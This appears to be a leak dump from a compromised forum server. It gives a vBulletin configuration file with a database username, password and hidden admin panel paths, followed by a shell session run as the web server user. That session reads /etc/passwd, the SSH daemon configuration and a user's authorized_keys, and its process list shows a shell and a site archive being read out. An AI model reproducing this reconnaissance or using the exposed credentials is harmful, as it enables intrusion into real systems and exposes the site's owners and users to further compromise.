2886| ****** NOTE REGARDING THE VARIABLES IN THIS FILE ****** |
2887+---------------------------------------------------------+
2888| If you get any errors while attempting to connect to |
2889| MySQL, you will need to email your webhost because we |
2890| cannot tell you the correct values for the variables |
2891| in this file. |
2892\*-------------------------------------------------------*/
2893
2894 // ****** DATABASE TYPE ******
2895 // This is the type of the database server on which your vBulletin database will be located.
2896 // Valid options are mysql and mysqli, for slave support add _slave. Try to use mysqli if you are using PHP
2897 5 and MySQL 4.1+
2898 // for slave options just append _slave to your preferred database type.
2899$config['Database']['dbtype'] = 'mysql';
2900
2901 // ****** DATABASE NAME ******
2902 // This is the name of the database where your vBulletin will be located.
2903 // This must be created by your webhost.
2904$config['Database']['dbname'] = 'edbforum';
2905
2906 // ****** TABLE PREFIX ******
2907 // Prefix that your vBulletin tables have in the database.
2908$config['Database']['tableprefix'] = '';
2909
2910 // ****** TECHNICAL EMAIL ADDRESS ******
2911 // If any database errors occur, they will be emailed to the address specified here.
2912 // Leave this blank to not send any emails when there is a database error.
2913$config['Database']['technicalemail'] = 'dbmaster@example.com';
2914
2915 // ****** FORCE EMPTY SQL MODE ******
2916 // New versions of MySQL (4.1+) have introduced some behaviors that are
2917 // incompatible with vBulletin. Setting this value to "true" disables those
2918 // behaviors. You only need to modify this value if vBulletin recommends it.
2919$config['Database']['force_sql_mode'] = false;
2920
2921
2922
2923 // ****** MASTER DATABASE SERVER NAME AND PORT ******
2924 // This is the hostname or IP address and port of the database server.
2925 // If you are unsure of what to put here, leave the default values.
2926 //
2927 // Note: If you are using IIS 7+ and MySQL is on the same machine, you
2928 // need to use 127.0.0.1 instead of localhost
2929$config['MasterServer']['servername'] = 'localhost';
2930$config['MasterServer']['port'] = 3306;
2931
2932 // ****** MASTER DATABASE USERNAME & PASSWORD ******
2933 // This is the username and password you use to access MySQL.
2934 // These must be obtained through your webhost.
2935$config['MasterServer']['username'] = 'forums';
2936$config['MasterServer']['password'] = '2834725234523472342';
2937
2938 // ****** MASTER DATABASE PERSISTENT CONNECTIONS ******
2939 // This option allows you to turn persistent connections to MySQL on or off.
2940 // The difference in performance is negligible for all but the largest boards.
2941 // If you are unsure what this should be, leave it off. (0 = off; 1 = on)
2942$config['MasterServer']['usepconnect'] = 0;
2943
2944
2945
2946 // ****** SLAVE DATABASE CONFIGURATION ******
2947 // If you have multiple database backends, this is the information for your slave
2948 // server. If you are not 100% sure you need to fill in this information,
2949 // do not change any of the values here.
2950$config['SlaveServer']['servername'] = '';
2951$config['SlaveServer']['port'] = 3306;
2952$config['SlaveServer']['username'] = '';
2953$config['SlaveServer']['password'] = '';
2954$config['SlaveServer']['usepconnect'] = 0;
2955
2956
2957
2958 // ****** PATH TO ADMIN & MODERATOR CONTROL PANELS ******
2959 // This setting allows you to change the name of the folders that the admin and
2960 // moderator control panels reside in. You may wish to do this for security purposes.
2961 // Please note that if you change the name of the directory here, you will still need
2962 // to manually change the name of the directory on the server.
2963$config['Misc']['admincpdir'] = 'admincp-23987239874298273987234';
2964$config['Misc']['modcpdir'] = 'modcp-23987239874298273987234';
2965
2966 // Prefix that all vBulletin cookies will have
2967 // Keep this short and only use numbers and letters, i.e. 1-9 and a-Z
2968$config['Misc']['cookieprefix'] = 'bb';
2969
2970 // ******** FULL PATH TO FORUMS DIRECTORY ******
2971 // On a few systems it may be necessary to input the full path to your forums directory
2972 // for vBulletin to function normally. You can ignore this setting unless vBulletin
2973 // tells you to fill this in. Do not include a trailing slash!
2974 // Example Unix:
2975 // $config['Misc']['forumpath'] = '/home/users/public_html/forums';
2976 // Example Win32:
2977 // $config['Misc']['forumpath'] = 'c:\program files\apache group\apache\htdocs\vb3';
2978$config['Misc']['forumpath'] = '';
2979
2980
2981
2982 // ****** USERS WITH ADMIN LOG VIEWING PERMISSIONS ******
2983 // The users specified here will be allowed to view the admin log in the control panel.
2984 // Users must be specified by *ID number* here. To obtain a user's ID number,
2985 // view their profile via the control panel. If this is a new installation, leave
2986 // the first user created will have a user ID of 1. Seperate each userid with a comma.
2987$config['SpecialUsers']['canviewadminlog'] = '1';
2988
2989 // ****** USERS WITH ADMIN LOG PRUNING PERMISSIONS ******
2990 // The users specified here will be allowed to remove ("prune") entries from the admin
2991 // log. See the above entry for more information on the format.
2992$config['SpecialUsers']['canpruneadminlog'] = '1';
2993
2994 // ****** USERS WITH QUERY RUNNING PERMISSIONS ******
2995 // The users specified here will be allowed to run queries from the control panel.
2996 // See the above entries for more information on the format.
2997 // Please note that the ability to run queries is quite powerful. You may wish
2998 // to remove all user IDs from this list for security reasons.
2999$config['SpecialUsers']['canrunqueries'] = '';
3000
3001 // ****** UNDELETABLE / UNALTERABLE USERS ******
3002 // The users specified here will not be deletable or alterable from the control panel by any users.
3003 // To specify more than one user, separate userids with commas.
3004$config['SpecialUsers']['undeletableusers'] = '';
3005
3006 // ****** SUPER ADMINISTRATORS ******
3007 // The users specified below will have permission to access the administrator permissions
3008 // page, which controls the permissions of other administrators
3009$config['SpecialUsers']['superadministrators'] = '1';
3010
3011 // ****** DATASTORE CACHE CONFIGURATION *****
3012 // Here you can configure different methods for caching datastore items.
3013 // vB_Datastore_Filecache - to use includes/datastore/datastore_cache.php
3014 // vB_Datastore_APC - to use APC
3015 // vB_Datastore_XCache - to use XCache
3016 // vB_Datastore_Memcached - to use a Memcache server, more configuration below
3017// $config['Datastore']['class'] = 'vB_Datastore_Filecache';
3018
3019 // ******** DATASTORE PREFIX ******
3020 // If you are using a PHP Caching system (APC, XCache, eAccelerator) with more
3021 // than one set of forums installed on your host, you *may* need to use a prefix
3022 // so that they do not try to use the same variable within the cache.
3023 // This works in a similar manner to the database table prefix.
3024// $config['Datastore']['prefix'] = '';
3025
3026 // It is also necessary to specify the hostname or IP address and the port the server is listening on
3027/*
3028$config['Datastore']['class'] = 'vB_Datastore_Memcached';
3029$i = 0;
3030// First Server
3031$i++;
3032$config['Misc']['memcacheserver'][$i] = '127.0.0.1';
3033$config['Misc']['memcacheport'][$i] = 11211;
3034$config['Misc']['memcachepersistent'][$i] = true;
3035$config['Misc']['memcacheweight'][$i] = 1;
3036$config['Misc']['memcachetimeout'][$i] = 1;
3037$config['Misc']['memcacheretry_interval'][$i] = 15;
3038*/
3039
3040// ****** The following options are only needed in special cases ******
3041
3042 // ****** MySQLI OPTIONS *****
3043 // When using MySQL 4.1+, MySQLi should be used to connect to the database.
3044 // If you need to set the default connection charset because your database
3045 // is using a charset other than latin1, you can set the charset here.
3046 // If you don't set the charset to be the same as your database, you
3047 // may receive collation errors. Ignore this setting unless you
3048 // are sure you need to use it.
3049// $config['Mysqli']['charset'] = 'utf8';
3050
3051 // Optionally, PHP can be instructed to set connection parameters by reading from the
3052 // file named in 'ini_file'. Please use a full path to the file.
3053 // Example:
3054 // $config['Mysqli']['ini_file'] = 'c:\program files\MySQL\MySQL Server 4.1\my.ini';
3055$config['Mysqli']['ini_file'] = '';
3056
3057// Image Processing Options
3058 // Images that exceed either dimension below will not be resized by vBulletin. If you need to resize larger image
3059s, alter these settings.
3060$config['Misc']['maxwidth'] = 2592;
3061$config['Misc']['maxheight'] = 1944;
3062
3063/*======================================================================*\
3064|| ####################################################################
3065|| # Downloaded: 10:22, Sat Nov 6th 2010
3066|| # CVS: $RCSfile$ - $Revision: 39199 $
3067|| ####################################################################
3068\*======================================================================*/
3069
3070$ cd /
3071
3072$ ls -la
3073total 112
3074drwxr-xr-x 26 root root 4096 Nov 30 06:53 .
3075drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
3076drw------- 2 root root 4096 Dec 4 03:45 backup
3077drw------- 2 root root 4096 Sep 1 07:38 backup-fix
3078drwxr-xr-x 2 root root 4096 Oct 11 09:00 bin
3079drwxr-xr-x 3 root root 4096 Nov 30 06:53 boot
3080drwxr-xr-x 3 root root 4096 Nov 11 16:56 build
3081drwxr-xr-x 2 root root 4096 Jul 9 05:29 cdrom
3082drwxr-xr-x 14 root root 3800 Nov 30 06:53 dev
3083drwxr-xr-x 91 root root 4096 Dec 2 06:34 etc
3084drwxr-xr-x 3 root root 4096 Aug 3 11:48 home
3085lrwxrwxrwx 1 root root 32 Nov 30 06:53 initrd.img -> boot/initrd.img-2.6.32-26-server
3086lrwxrwxrwx 1 root root 32 Oct 4 16:30 initrd.img.old -> boot/initrd.img-2.6.32-25-server
3087drwxr-xr-x 13 root root 12288 Nov 18 06:54 lib
3088lrwxrwxrwx 1 root root 4 Jul 9 05:28 lib64 -> /lib
3089drwx------ 2 root root 16384 Jul 9 05:28 lost+found
3090drwxr-xr-x 2 root root 4096 Jul 9 15:17 maint
3091drwxr-xr-x 3 root root 4096 Jul 9 05:28 media
3092drwxr-xr-x 4 root root 4096 Jul 9 20:03 mnt
3093drwxr-xr-x 3 root root 4096 Oct 7 16:53 opt
3094dr-xr-xr-x 227 root root 0 Nov 11 10:45 proc
3095drwx------ 9 root root 4096 Nov 25 09:08 root
3096drwxr-xr-x 2 root root 4096 Oct 29 19:00 sbin
3097drwxr-xr-x 2 root root 4096 Dec 5 2009 selinux
3098drwxr-xr-x 2 root root 4096 Jul 9 05:28 srv
3099drwxr-xr-x 13 root root 0 Nov 11 10:45 sys
3100drwxrwxrwt 3 root root 4096 Dec 4 14:59 tmp
3101drwxr-xr-x 10 root root 4096 Jul 9 05:28 usr
3102drwxr-xr-x 19 root root 4096 Sep 24 09:26 var
3103lrwxrwxrwx 1 root root 29 Nov 30 06:53 vmlinuz -> boot/vmlinuz-2.6.32-26-server
3104lrwxrwxrwx 1 root root 29 Oct 4 16:30 vmlinuz.old -> boot/vmlinuz-2.6.32-25-server
3105
3106$ cat /etc/passwd
3107root:x:0:0:root:/root:/bin/bash
3108daemon:x:1:1:daemon:/usr/sbin:/bin/sh
3109bin:x:2:2:bin:/bin:/bin/sh
3110sys:x:3:3:sys:/dev:/bin/sh
3111sync:x:4:65534:sync:/bin:/bin/sync
3112games:x:5:60:games:/usr/games:/bin/sh
3113man:x:6:12:man:/var/cache/man:/bin/sh
3114lp:x:7:7:lp:/var/spool/lpd:/bin/sh
3115mail:x:8:8:mail:/var/mail:/bin/sh
3116news:x:9:9:news:/var/spool/news:/bin/sh
3117uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
3118proxy:x:13:13:proxy:/bin:/bin/sh
3119www-data:x:33:33:www-data:/var/www:/bin/sh
3120backup:x:34:34:backup:/var/backups:/bin/sh
3121list:x:38:38:Mailing List Manager:/var/list:/bin/sh
3122irc:x:39:39:ircd:/var/run/ircd:/bin/sh
3123gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
3124nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
3125libuuid:x:100:101::/var/lib/libuuid:/bin/sh
3126syslog:x:101:103::/home/syslog:/bin/false
3127sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
3128landscape:x:103:108::/var/lib/landscape:/bin/false
3129mysql:x:104:112:MySQL Server,,,:/var/lib/mysql:/bin/false
3130smmta:x:105:114:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
3131smmsp:x:106:115:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
3132emgent:x:1003:1002:,,,:/home/emgent:/bin/bash
3133ossec:x:1004:1003::/var/ossec:/bin/false
3134ossecm:x:1005:1003::/var/ossec:/bin/false
3135ossecr:x:1006:1003::/var/ossec:/bin/false
3136
3137$ cat /etc/issue
3138Ubuntu 10.04.1 LTS \n \l
3139
3140
3141$ cat /etc/ssh/sshd_config
3142# Package generated configuration file
3143# See the sshd_config(5) manpage for details
3144
3145# What ports, IPs and protocols we listen for
3146Port 22
3147# Use these options to restrict which interfaces/protocols sshd will bind to
3148#ListenAddress ::
3149#ListenAddress 0.0.0.0
3150Protocol 2
3151# HostKeys for protocol version 2
3152HostKey /etc/ssh/ssh_host_rsa_key
3153HostKey /etc/ssh/ssh_host_dsa_key
3154#Privilege Separation is turned on for security
3155UsePrivilegeSeparation yes
3156
3157# Lifetime and size of ephemeral version 1 server key
3158KeyRegenerationInterval 3600
3159ServerKeyBits 768
3160
3161# Logging
3162SyslogFacility AUTH
3163LogLevel INFO
3164
3165# Authentication:
3166LoginGraceTime 120
3167PermitRootLogin yes
3168StrictModes yes
3169
3170RSAAuthentication yes
3171PubkeyAuthentication yes
3172#AuthorizedKeysFile %h/.ssh/authorized_keys
3173
3174# Don't read the user's ~/.rhosts and ~/.shosts files
3175IgnoreRhosts yes
3176# For this to work you will also need host keys in /etc/ssh_known_hosts
3177RhostsRSAAuthentication no
3178# similar for protocol version 2
3179HostbasedAuthentication no
3180# Uncomment if you don't trust ~/.ssh/known_hosts for RhostsRSAAuthentication
3181#IgnoreUserKnownHosts yes
3182
3183# To enable empty passwords, change to yes (NOT RECOMMENDED)
3184PermitEmptyPasswords no
3185
3186# Change to yes to enable challenge-response passwords (beware issues with
3187# some PAM modules and threads)
3188ChallengeResponseAuthentication no
3189
3190# Change to no to disable tunnelled clear text passwords
3191PasswordAuthentication yes
3192
3193# Kerberos options
3194#KerberosAuthentication no
3195#KerberosGetAFSToken no
3196#KerberosOrLocalPasswd yes
3197#KerberosTicketCleanup yes
3198
3199# GSSAPI options
3200#GSSAPIAuthentication no
3201#GSSAPICleanupCredentials yes
3202
3203X11Forwarding yes
3204X11DisplayOffset 10
3205PrintMotd no
3206PrintLastLog yes
3207TCPKeepAlive yes
3208#UseLogin no
3209
3210#MaxStartups 10:30:60
3211#Banner /etc/issue.net
3212
3213# Allow client to pass locale environment variables
3214AcceptEnv LANG LC_*
3215
3216Subsystem sftp /usr/lib/openssh/sftp-server
3217
3218# Set this to 'yes' to enable PAM authentication, account processing,
3219# and session processing. If this is enabled, PAM authentication will
3220# be allowed through the ChallengeResponseAuthentication and
3221# PasswordAuthentication. Depending on your PAM configuration,
3222# PAM authentication via ChallengeResponseAuthentication may bypass
3223# the setting of "PermitRootLogin without-password".
3224# If you just want the PAM account and session checks to run without
3225# PAM authentication, then enable this but set PasswordAuthentication
3226# and ChallengeResponseAuthentication to 'no'.
3227UsePAM yes
3228
3229$ cd /home
3230
3231$ ls -la
3232total 12
3233drwxr-xr-x 3 root root 4096 Aug 3 11:48 .
3234drwxr-xr-x 26 root root 4096 Nov 30 06:53 ..
3235drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 emgent
3236
3237$ cd emgent
3238
3239$ ls -la
3240total 48
3241drwxr-xr-x 7 emgent emgent 4096 Aug 7 07:45 .
3242drwxr-xr-x 3 root root 4096 Aug 3 11:48 ..
3243-rw------- 1 emgent emgent 259 Oct 18 11:39 .bash_history
3244-rw-r--r-- 1 emgent emgent 220 Aug 3 11:48 .bash_logout
3245-rw-r--r-- 1 emgent emgent 3103 Aug 3 11:48 .bashrc
3246drwx------ 2 emgent emgent 4096 Aug 3 11:49 .cache
3247drwx------ 2 emgent emgent 4096 Aug 3 11:49 .irssi
3248-rw------- 1 emgent emgent 9 Aug 3 11:50 .nano_history
3249-rw-r--r-- 1 emgent emgent 675 Aug 3 11:48 .profile
3250drwxr-xr-x 2 emgent emgent 4096 Aug 3 11:49 .ssh
3251drwxr-xr-x 3 emgent emgent 4096 Aug 7 07:45 .subversion
3252drwxr-xr-x 4 emgent emgent 4096 Aug 7 07:46 exploitdb
3253
3254
3255
3256$ cd .ssh
3257
3258$ ls
3259authorized_keys
3260cat authorized_keys
3261ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAntXlep19oECqVocmK6UIhsxI5yGQSPUVYWOZXWO7Q0wP9vF5FfHmE4yCmKt+MleWcPWkkbI6IXBt9TNtw7m6usPx2IEbpEVr8sl7pT8hiW8tKNew74gEEgE53AGLhWr/+vViL+5K4SKCt591oABDtWA6KIEOuyx9/jqLLwBTQP0UyrqIJpR9VhQ2GQ6tN6Y+LV4tvpqy8ehevsIqdj+HvdsvVU2sREJsSH5xAncaRJQ1sfQepyeAwi7yZ1fBT4U4/LlukkBLIqjXk2D6jPZG870R4KCEI280rBJ9DX4fPX9qvYUwOm/OtWwxC7kivuCnNM1v2wBRUVCBmSUimqWnpQ== emgent@enJoy
3262
3263$ ps aux
3264USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
3265root 1 0.0 0.0 23680 1244 ? Ss Nov11 0:07 /sbin/init
3266root 2 0.0 0.0 0 0 ? S Nov11 0:00 [kthreadd]
3267root 3 0.0 0.0 0 0 ? S Nov11 0:01 [migration/0]
3268root 4 0.0 0.0 0 0 ? S Nov11 0:12 [ksoftirqd/0]
3269root 5 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/0]
3270root 6 0.0 0.0 0 0 ? S Nov11 0:02 [migration/1]
3271root 7 0.0 0.0 0 0 ? S Nov11 0:04 [ksoftirqd/1]
3272root 8 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/1]
3273root 9 0.0 0.0 0 0 ? S Nov11 0:02 [migration/2]
3274root 10 0.0 0.0 0 0 ? S Nov11 0:02 [ksoftirqd/2]
3275root 11 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/2]
3276root 12 0.0 0.0 0 0 ? S Nov11 0:01 [migration/3]
3277root 13 0.0 0.0 0 0 ? S Nov11 0:05 [ksoftirqd/3]
3278root 14 0.0 0.0 0 0 ? S Nov11 0:00 [watchdog/3]
3279root 15 0.0 0.0 0 0 ? S Nov11 0:32 [events/0]
3280root 16 0.0 0.0 0 0 ? S Nov11 13:44 [events/1]
3281root 17 0.0 0.0 0 0 ? S Nov11 0:17 [events/2]
3282root 18 0.0 0.0 0 0 ? S Nov11 0:18 [events/3]
3283root 19 0.0 0.0 0 0 ? S Nov11 0:00 [cpuset]
3284root 20 0.0 0.0 0 0 ? S Nov11 0:00 [khelper]
3285root 21 0.0 0.0 0 0 ? S Nov11 0:00 [netns]
3286root 22 0.0 0.0 0 0 ? S Nov11 0:00 [async/mgr]
3287root 23 0.0 0.0 0 0 ? S Nov11 0:00 [pm]
3288root 25 0.0 0.0 0 0 ? S Nov11 0:02 [sync_supers]
3289root 26 0.0 0.0 0 0 ? S Nov11 0:04 [bdi-default]
3290root 27 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/0]
3291root 28 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/1]
3292root 29 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/2]
3293root 30 0.0 0.0 0 0 ? S Nov11 0:00 [kintegrityd/3]
3294root 31 0.0 0.0 0 0 ? S Nov11 11:09 [kblockd/0]
3295root 32 0.0 0.0 0 0 ? S Nov11 2:17 [kblockd/1]
3296root 33 0.0 0.0 0 0 ? S Nov11 1:33 [kblockd/2]
3297root 34 0.0 0.0 0 0 ? S Nov11 1:14 [kblockd/3]
3298root 35 0.0 0.0 0 0 ? S Nov11 0:00 [kacpid]
3299root 36 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_notify]
3300root 37 0.0 0.0 0 0 ? S Nov11 0:00 [kacpi_hotplug]
3301root 38 0.0 0.0 0 0 ? S Nov11 0:00 [ata/0]
3302root 39 0.0 0.0 0 0 ? S Nov11 0:00 [ata/1]
3303root 40 0.0 0.0 0 0 ? S Nov11 0:00 [ata/2]
3304root 41 0.0 0.0 0 0 ? S Nov11 0:00 [ata/3]
3305root 42 0.0 0.0 0 0 ? S Nov11 0:00 [ata_aux]
3306root 43 0.0 0.0 0 0 ? S Nov11 0:00 [ksuspend_usbd]
3307root 44 0.0 0.0 0 0 ? S Nov11 0:00 [khubd]
3308root 45 0.0 0.0 0 0 ? S Nov11 0:00 [kseriod]
3309root 46 0.0 0.0 0 0 ? S Nov11 0:00 [kmmcd]
3310root 51 0.0 0.0 0 0 ? S Nov11 0:00 [khungtaskd]
3311root 52 0.0 0.0 0 0 ? S Nov11 0:30 [kswapd0]
3312root 53 0.0 0.0 0 0 ? SN Nov11 0:00 [ksmd]
3313root 54 0.0 0.0 0 0 ? S Nov11 0:00 [aio/0]
3314root 55 0.0 0.0 0 0 ? S Nov11 0:00 [aio/1]
3315root 56 0.0 0.0 0 0 ? S Nov11 0:00 [aio/2]
3316root 57 0.0 0.0 0 0 ? S Nov11 0:00 [aio/3]
3317root 58 0.0 0.0 0 0 ? S Nov11 0:00 [ecryptfs-kthrea]
3318root 59 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/0]
3319root 60 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/1]
3320root 61 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/2]
3321root 62 0.0 0.0 0 0 ? S Nov11 0:00 [crypto/3]
3322root 65 0.0 0.0 0 0 ? S Nov11 0:00 [pciehpd]
3323root 66 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_0]
3324root 67 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_1]
3325root 69 0.0 0.0 0 0 ? S Nov11 0:00 [kstriped]
3326root 70 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/0]
3327root 71 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/1]
3328root 72 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/2]
3329root 73 0.0 0.0 0 0 ? S Nov11 0:00 [kmpathd/3]
3330root 74 0.0 0.0 0 0 ? S Nov11 0:00 [kmpath_handlerd]
3331root 75 0.0 0.0 0 0 ? S Nov11 0:00 [ksnapd]
3332root 76 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/0]
3333root 77 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/1]
3334root 78 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/2]
3335root 79 0.0 0.0 0 0 ? S Nov11 0:00 [kondemand/3]
3336root 80 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/0]
3337root 81 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/1]
3338root 82 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/2]
3339root 83 0.0 0.0 0 0 ? S Nov11 0:00 [kconservative/3]
3340root 191 0.0 0.0 0 0 ? S Nov11 1:03 [mpt_poll_0]
3341root 192 0.0 0.0 0 0 ? S Nov11 0:00 [mpt/0]
3342root 268 0.0 0.0 0 0 ? S Nov11 0:00 [scsi_eh_2]
3343root 285 0.3 0.0 0 0 ? S Nov11 125:09 [jbd2/sda1-8]
3344root 286 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
3345root 287 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
3346root 288 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
3347root 289 0.0 0.0 0 0 ? S Nov11 0:00 [ext4-dio-unwrit]
3348root 322 0.3 0.0 0 0 ? S Nov11 115:40 [flush-8:0]
3349root 347 0.0 0.0 16904 640 ? S Nov11 0:00 upstart-udev-bridge --daemon
3350root 363 0.0 0.0 16920 416 ? S<s Nov11 0:00 udevd --daemon
3351root 582 0.0 0.0 0 0 ? S Nov11 0:00 [kpsmoused]
3352syslog 714 0.0 0.0 191492 1148 ? Sl Nov11 3:22 rsyslogd -c4
3353root 732 0.0 0.0 49260 528 ? Ss Nov11 0:01 /usr/sbin/sshd
3354root 773 0.0 0.0 6080 284 tty4 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty4
3355root 777 0.0 0.0 6080 284 tty5 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty5
3356root 787 0.0 0.0 6080 284 tty2 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty2
3357root 788 0.0 0.0 6080 284 tty3 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty3
3358root 792 0.0 0.0 6080 284 tty6 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty6
3359root 806 0.0 0.0 21076 428 ? Ss Nov11 0:07 cron
3360daemon 807 0.0 0.0 18884 348 ? Ss Nov11 0:00 atd
3361root 817 0.0 0.0 11284 428 ? Ss Nov11 1:53 /usr/sbin/irqbalance
3362root 950 0.0 0.0 84384 848 ? Ss Nov11 1:24 sendmail: MTA: accepting connections
3363root 1318 0.0 0.0 53108 4076 ? Sl Nov11 7:28 /usr/bin/python /usr/bin/fail2ban-server -b -s /var/run/fail2ban/fail2ban.sock
3364root 1354 0.0 0.0 97040 408 ? Ss Nov11 0:07 /usr/bin/svnserve -d -r /var/svn/
3365root 1357 0.0 0.0 6080 284 tty1 Ss+ Nov11 0:00 /sbin/getty -8 38400 tty1
3366root 3467 0.0 0.0 0 0 ? S Nov30 0:00 [xfs_mru_cache]
3367root 3468 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/0]
3368root 3469 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/1]
3369root 3470 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/2]
3370root 3471 0.0 0.0 0 0 ? S Nov30 0:00 [xfslogd/3]
3371root 3472 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/0]
3372root 3473 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/1]
3373root 3474 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/2]
3374root 3475 0.0 0.0 0 0 ? S Nov30 0:00 [xfsdatad/3]
3375root 3476 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/0]
3376root 3477 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/1]
3377root 3478 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/2]
3378root 3479 0.0 0.0 0 0 ? S Nov30 0:00 [xfsconvertd/3]
3379root 3489 0.0 0.0 16980 372 ? S< Nov30 0:00 udevd --daemon
3380root 3490 0.0 0.0 16980 376 ? S< Nov30 0:00 udevd --daemon
3381root 3491 0.0 0.0 0 0 ? S Nov30 0:00 [jfsIO]
3382root 3492 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
3383root 3493 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
3384root 3494 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
3385root 3495 0.0 0.0 0 0 ? S Nov30 0:00 [jfsCommit]
3386root 3496 0.0 0.0 0 0 ? S Nov30 0:00 [jfsSync]
3387root 4114 0.0 0.0 107552 1928 ? S Nov23 0:00 /usr/bin/svnserve -d -r /var/svn/
3388root 7702 0.0 0.0 107420 1960 ? S 13:31 0:00 /usr/bin/svnserve -d -r /var/svn/
3389root 8080 0.1 0.1 346236 11548 ? Ss Nov26 18:14 /usr/sbin/apache2 -k start
3390root 9853 0.0 0.0 9756 384 ? Ss Nov11 1:04 tail -f /var/log/apache2/jesys.log
3391www-data 10874 0.0 0.6 354384 38764 ? S 14:15 0:00 /usr/sbin/apache2 -k start
3392www-data 10909 0.0 0.0 25632 2876 ? S 14:15 0:00 dhcpcd
3393www-data 10910 0.0 0.0 4096 656 ? S 14:15 0:00 /bin/sh
3394www-data 13491 0.1 0.6 356496 39580 ? S 14:54 0:01 /usr/sbin/apache2 -k start
3395root 13493 0.1 0.1 116628 11268 ? S 14:54 0:00 /usr/bin/svnserve -d -r /var/svn/
3396www-data 13510 0.0 0.0 4040 524 ? S 14:55 0:00 cat www.tar.gz
3397root 13561 0.0 0.0 107420 1940 ? S Nov30 0:00 /usr/bin/svnserve -d -r /var/svn/
3398www-data 13681 0.1 0.5 354240 32356 ? S 14:57 0:00 /usr/sbin/apache2 -k start
3399www-data 13884 0.1 0.5 354792 33064 ? S 14:59 0:00 /usr/sbin/apache2 -k start
3400www-data 13889 0.2 0.5 353632 31568 ? S 14:59 0:01 /usr/sbin/apache2 -k start
3401www-data 13960 0.0 0.6 354384 38812 ? S 15:01 0:00 /usr/sbin/apache2 -k start
3402www-data 13976 0.2 0.5 355192 32200 ? S 15:01 0:00 /usr/sbin/apache2 -k start
3403www-data 14022 0.0 0.0 25632 2876 ? S 15:02 0:00 dhcpcd
3404www-data 14023 0.0 0.0 4096 628 ? S 15:02 0:00 /bin/sh
3405www-data 14026 0.2 0.5 353888 33228 ? S 15:02 0:00 /usr/sbin/apache2 -k start
3406www-data 14027 0.1 0.5 356512 32860 ? S 15:02 0:00 /usr/sbin/apache2 -k start
3407www-data 14062 0.2 0.5 353548 32144 ? S 15:03 0:00 /usr/sbin/apache2 -k start
3408www-data 14063 0.1 0.5 353644 30840 ? S 15:03 0:00 /usr/sbin/apache2 -k start
3409www-data 14152 0.2 0.5 353376 31236 ? S 15:04 0:00 /usr/sbin/apache2 -k start
3410www-data 14154 0.3 0.5 352856 31284 ? S 15:04 0:00 /usr/sbin/apache2 -k start
3411www-data 14159 0.1 0.5 353888 30852 ? S 15:04 0:00 /usr/sbin/apache2 -k start
3412www-data 14160 0.2 0.5 355332 31280 ? S 15:04 0:00 /usr/sbin/apache2 -k start
3413www-data 14163 0.1 0.5 354204 31520 ? S 15:04 0:00 /usr/sbin/apache2 -k start
3414www-data 14183 0.1 0.4 353804 30404 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3415www-data 14185 0.2 0.4 352724 30460 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3416www-data 14188 0.2 0.5 353544 32600 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3417www-data 14194 0.1 0.4 353880 30564 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3418www-data 14201 0.1 0.5 353500 31264 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3419www-data 14204 0.2 0.5 354516 32044 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3420www-data 14205 0.1 0.4 353360 29148 ? S 15:05 0:00 /usr/sbin/apache2 -k start
3421ossecm 14276 0.0 0.0 16844 644 ? S Dec02 0:01 /var/ossec/bin/ossec-maild
3422root 14286 0.0 0.0 12496 576 ? S Dec02 0:03 /var/ossec/bin/ossec-execd
